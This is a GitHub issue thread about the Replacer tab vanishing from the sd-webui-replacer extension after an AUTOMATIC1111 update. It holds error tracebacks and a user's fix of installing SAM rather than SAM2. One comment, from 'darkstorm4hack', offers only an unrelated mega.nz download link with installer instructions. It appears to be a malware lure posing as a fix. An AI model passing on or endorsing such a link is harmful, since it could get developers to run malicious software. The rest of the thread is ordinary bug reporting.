### ISSUE TITLE
Replacer Tab disappeared after update AUTOMATIC1111 to version: v1.10.1  

### ISSUE THREAD

**Issue by web2299** [light-and-ray/sd-webui-replacer#98]
Replacer Tab disappeared after update AUTOMATIC1111 to version: v1.10.1  .

![Untitled1](https://github.com/user-attachments/assets/ffc7875e-3a4c-4ca9-8acd-5beb4142b724)

In start i receive this error:

`*** Error executing callback before_ui for C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_main_ui.py
    Traceback (most recent call last):
      File "C:\SD\stable-diffusion-webui\modules\script_callbacks.py", line 397, in before_ui_callback
        c.callback()
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\replacer\ui\replacer_main_ui.py", line 48, in initMainUI
        replacerMainUI = ReplacerMainUI(isDedicatedPage=False)
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\replacer\ui\replacer_main_ui.py", line 21, in __init__
        self.init_tab(isDedicatedPage)
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\replacer\ui\replacer_main_ui.py", line 25, in init_tab
        self.replacerTabUI = getTabUI(comp, isDedicatedPage)
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\replacer\ui\replacer_tab_ui.py", line 112, in getTabUI
        makeAdvancedOptions(comp, isDedicatedPage)
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\replacer\ui\make_advanced_options.py", line 129, in makeAdvancedOptions
        from scripts.sam import sam_model_list, refresh_sam_models
    ModuleNotFoundError: No module named 'scripts.sam'

---
2024-08-25 12:41:35,669 - ControlNet - INFO - ControlNet UI callback registered.
*** Error executing callback ui_tabs_callback for C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_main_ui.py
    Traceback (most recent call last):
      File "C:\SD\stable-diffusion-webui\modules\script_callbacks.py", line 283, in ui_tabs_callback
        res += c.callback() or []
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_main_ui.py", line 18, in on_ui_tabs
        tab = replacer_main_ui.replacerMainUI.getReplacerTabUI()
    AttributeError: 'NoneType' object has no attribute 'getReplacerTabUI'

---
Creating model from config: C:\SD\stable-diffusion-webui\configs\v1-inpainting-inference.yaml
Running on local URL:  http://127.0.0.1:7860

To create a public link, set `share=True` in `launch()`.
*** Error executing callback app_started_callback for C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_api.py
    Traceback (most recent call last):
      File "C:\SD\stable-diffusion-webui\modules\script_callbacks.py", line 256, in app_started_callback
        c.callback(demo, app)
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_api.py", line 18, in replacer_api
        from scripts.sam import sam_model_list
    ModuleNotFoundError: No module named 'scripts.sam'

---
*** [Replacer] error while creating dedicated page: 'NoneType' object has no attribute 'getReplacerTabUI'
    Traceback (most recent call last):
      File "C:\SD\stable-diffusion-webui\extensions\sd-webui-replacer\scripts\replacer_main_ui.py", line 43, in mountDedicatedPage
        tab = replacer_main_ui.replacerMainUI_dedicated.getReplacerTabUI()
    AttributeError: 'NoneType' object has no attribute 'getReplacerTabUI'

---
Startup time: 20.7s (prepare environment: 4.2s, import torch: 5.6s, import gradio: 1.4s, setup paths: 1.3s, initialize shared: 0.3s, other imports: 0.9s, load scripts: 5.0s, create ui: 0.9s, gradio launch: 0.9s).
Applying attention optimization: xformers... done.
Model loaded in 13.1s (load weights from disk: 1.3s, create model: 2.2s, apply weights to model: 8.9s, apply half(): 0.2s, calculate empty prompt: 0.2s).`

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by fuckemooncoin** [comment]
Replacer Tap is gone after extension update. 
![image](https://github.com/user-attachments/assets/43ed009f-e533-47a6-b36d-ea935484fa00)

Replace tap setting screen has been changed as well after extension update. 
![image](https://github.com/user-attachments/assets/0867a799-092a-4774-bd4d-9e80d9b9f037)

Consequence
Instead oof Replacer tap, Inpaint Anything tap is appeared. 
![image](https://github.com/user-attachments/assets/7392c7b6-de3c-4d32-8dce-4f5cb364c218)

Can you show us workable solution to this issue?

**Comment by web2299** [comment]
I just installed SAM instead SAM2 and now i get Replacer Tab and it works .

**Comment by web2299** [comment]
> What do you mean? What is Sam 2 extension?

https://github.com/facebookresearch/segment-anything-2
